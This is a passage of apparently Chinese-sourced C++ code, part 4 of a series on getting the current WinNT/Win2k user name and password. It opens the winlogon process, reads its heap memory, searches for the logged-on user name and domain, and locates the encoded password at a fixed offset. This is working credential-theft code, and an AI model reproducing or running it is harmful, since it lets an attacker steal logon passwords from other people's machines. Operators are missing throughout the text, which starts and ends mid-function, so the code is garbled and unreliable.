获取WinNT/Win2k当前用户名和密码(4)



) !=0 )
return (0);
if(strName.UpperCase().Pos("MSGINA") !=0 )
dwRc =QuerySystemInformationP->PID;
}
if(pvDebugBuffer)
pfnRtlDestroyQueryDebugBuffer(pvDebugBuffer);
HeapFree(GetProcessHeap(), 0, pvInfo);
return (dwRc);
}
}
if (pvDebugBuffer)
pfnRtlDestroyQueryDebugBuffer(pvDebugBuffer);
}
DWORD dwTemp = (DWORD)QuerySystemInformationP;
dwTemp = sizeof(QUERY_SYSTEM_INFORMATION);
QuerySystemInformationP = (PQUERY_SYSTEM_INFORMATION)dwTemp;
}
}
catch(...)
{}
HeapFree(GetProcessHeap(), 0, pvInfo);
return (dwRc);
}
//---------------------------------------------------------------------------
BOOL LocatePasswordPageWinNT(DWORD dwWinLogonPID, PDWORD pdwPwdLen)
{
#define USER_DOMAIN_OFFSET_WINNT 0x200
#define USER_PASSWORD_OFFSET_WINNT 0x400
BOOL bRc = FALSE;
HANDLE hWinLogonHandle = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,
FALSE, dwWinLogonPID);
if(!hWinLogonHandle)
return (bRc);
*pdwPwdLen = 0;
SYSTEM_INFO siSystemInfo;
GetSystemInfo(&siSystemInfo);
DWORD dwPEB = 0x7ffdf000;
DWORD dwBytesCopied = 0;
PVOID pvEBP = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, siSystemInfo.dwPageSize);
if(!ReadProcessMemory(hWinLogonHandle, (PVOID)dwPEB, pvEBP,
siSystemInfo.dwPageSize, &dwBytesCopied))
{
CloseHandle(hWinLogonHandle);
return (bRc);
}
// Grab the value of the 2nd DWORD in the TEB.
PDWORD pdwWinLogonHeap = (PDWORD)((DWORD)pvEBP (6 * sizeof (DWORD)));
MEMORY_BASIC_INFORMATION mbiMemoryBasicInfor;
if(VirtualQueryEx(hWinLogonHandle, (PVOID) *pdwWinLogonHeap,
&mbiMemoryBasicInfor, sizeof(MEMORY_BASIC_INFORMATION)))
if(((mbiMemoryBasicInfor.State & MEM_COMMIT) == MEM_COMMIT) &&
((mbiMemoryBasicInfor.Protect & PAGE_GUARD) == 0))
{
PVOID pvWinLogonMem = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,
mbiMemoryBasicInfor.RegionSize);
if(ReadProcessMemory(hWinLogonHandle, (PVOID)*pdwWinLogonHeap,
pvWinLogonMem, mbiMemoryBasicInfor.RegionSize, &dwBytesCopied))
{
DWORD i = (DWORD)pvWinLogonMem;
DWORD dwUserNamePos = 0;
// The order in memory is wszUserName followed by the wszUserDomain.
do
{
if((wcscmp(wszUserName, (wchar_t *)i) == 0) &&
(wcscmp(wszUserDomain, (wchar_t *)
(i USER_DOMAIN_OFFSET_WINNT)) == 0))
{
dwUserNamePos = i;
break;
}
i = 2;
}while(i < (DWORD)pvWinLogonMem mbiMemoryBasicInfor.RegionSize);
if(dwUserNamePos)
{
PENCODED_PASSWORD_INFO pepiEncodedPwdInfo =
(PENCODED_PASSWORD_INFO)((DWORD)dwUserNamePos
USER_PASSWORD_OFFSET_WINNT);
FILETIME ftLocalFileTime;
SYSTEMTIME stSystemTime;
if(FileTimeToLocalFileTime(&pepiEncodedPwdInfo->LoggedOn,
&ftLocalFileTime))
if(FileTimeToSystemTime(&ftLocalFileTime, &stSystemTime))


